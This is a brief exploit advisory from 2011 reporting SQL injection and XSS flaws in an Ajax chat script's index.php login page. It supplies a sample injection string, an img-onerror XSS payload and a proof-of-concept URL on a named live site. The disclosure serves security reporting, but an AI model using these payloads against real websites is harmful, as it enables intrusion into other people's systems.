# Exploit Title: Ajax Script SQL Injection and XSS Vulnerability
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr


ISSUE

SQL Injection and XSS can be done using the POST method. Tamper data  
is available.

Vulnerable Page:
index.php (SQLInjection - XSS)


Example:
##xa7 (For Sql Injection)
"/></a></><img src=eyup.gif onerror=alert(1)> (For XSS)


POC:
http://www.ajaxchat.org/chat/index.php?branch=login


Thanks,

Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr